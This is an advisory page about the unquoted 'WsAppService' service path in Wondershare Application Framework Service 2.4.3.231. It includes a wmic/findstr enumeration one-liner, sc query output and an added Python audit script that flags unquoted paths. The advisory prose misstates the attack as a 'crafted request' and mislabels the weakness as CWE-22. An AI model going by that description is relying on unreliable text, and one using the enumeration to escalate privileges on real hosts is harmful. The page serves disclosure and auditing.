Vendor: Wondershare Application Framework Service
By: chuyreds
CVSS: 7.8 (HIGH)
Unquote Service Path
CWE: 22
Product Name: Wondershare Application Framework Service
Affected Version From: 2.4.3.231
Affected Version To: 2.4.3.231
Patch Exists: YES
Related CWE: N/A
CPE: a:wondershare:wondershare_application_framework_service
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Home Single Language
2019

Wondershare Application Framework Service 2.4.3.231 – ‘WsAppService’ Unquote Service Path

A vulnerability exists in Wondershare Application Framework Service 2.4.3.231 that allows an attacker to gain elevated privileges by exploiting the unquoted service path of the 'WsAppService' service. The vulnerability is due to the lack of proper validation of the service path: as the service info below shows, the executable path contains spaces and is registered without enclosing quotes. An attacker can exploit this vulnerability by sending a specially crafted request to the service path. Successful exploitation could result in the attacker gaining elevated privileges.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the software.

Exploit-DB raw data:

# Exploit Title: Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: chuyreds
# Vendor Homepage: https://www.wondershare.com/
# Software Link: https://www.wondershare.com/drfone/
# Version: 2.4.3.231
# Tested on: Windows 10 Home Single Language
# CVE : N/A

# Explot-Wondershare WsAppService.txt

#Service Info:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Wondershare Application Framework Service           WsAppService      C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe         Auto


C:\Users\user>sc query WsAppService

NOMBRE_SERVICIO: WsAppService
        TIPO               : 10  WIN32_OWN_PROCESS
        ESTADO             : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        CÓD_SALIDA_WIN32   : 0  (0x0)
        CÓD_SALIDA_SERVICIO: 0  (0x0)
        PUNTO_COMPROB.     : 0x0
        INDICACIÓN_INICIO  : 0x0
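
The wmic/findstr filter above, written out as an audit check. This is an added example, not part of the original Exploit-DB entry. It goes beyond the one-liner by separating the executable from its arguments instead of excluding C:\Windows wholesale, and it prints the quoted value each flagged service should be registered with. Apart from the WsAppService row, the sample rows are constructed.

```python
import re

# Executable portion of an unquoted PathName: text up to the first ".exe"
# that is followed by whitespace or end of string.
_EXE = re.compile(r"^(.*?\.exe)(?=\s|$)", re.IGNORECASE)

def split_image_path(pathname):
    """Return (executable, arguments, was_quoted) for a service PathName."""
    p = pathname.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        if end == -1:                      # unbalanced quote: keep whole value
            return p[1:], "", True
        return p[1:end], p[end + 1:].strip(), True
    m = _EXE.match(p)
    if m:
        return m.group(1), p[m.end():].strip(), False
    return p, "", False                    # no ".exe" seen: treat all as path

def audit(services):
    """services: iterable of (name, pathname) pairs.
    Flags paths that are unquoted AND contain a space in the executable part."""
    findings = []
    for name, pathname in services:
        exe, args, quoted = split_image_path(pathname)
        if quoted or " " not in exe:
            continue
        fixed = '"' + exe + '"' + (" " + args if args else "")
        findings.append({"service": name, "path": exe, "quoted_value": fixed})
    return findings

# First row is the PathName shown on this page; the rest are constructed.
SAMPLE = [
    ("WsAppService",
     r"C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe"),
    ("QuotedSvc", r'"C:\Program Files\Example\svc.exe" --run'),
    ("Schedule", r"C:\Windows\system32\svchost.exe -k netsvcs -p"),
    ("ArgSvc", r"C:\Program Files\Example Tool\agent.exe /service"),
]

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f["service"], "->", f["quoted_value"])
```

Feed it the name and pathname columns exported from the service inventory of the hosts being audited; a service that is still flagged after updating needs its registered path quoted.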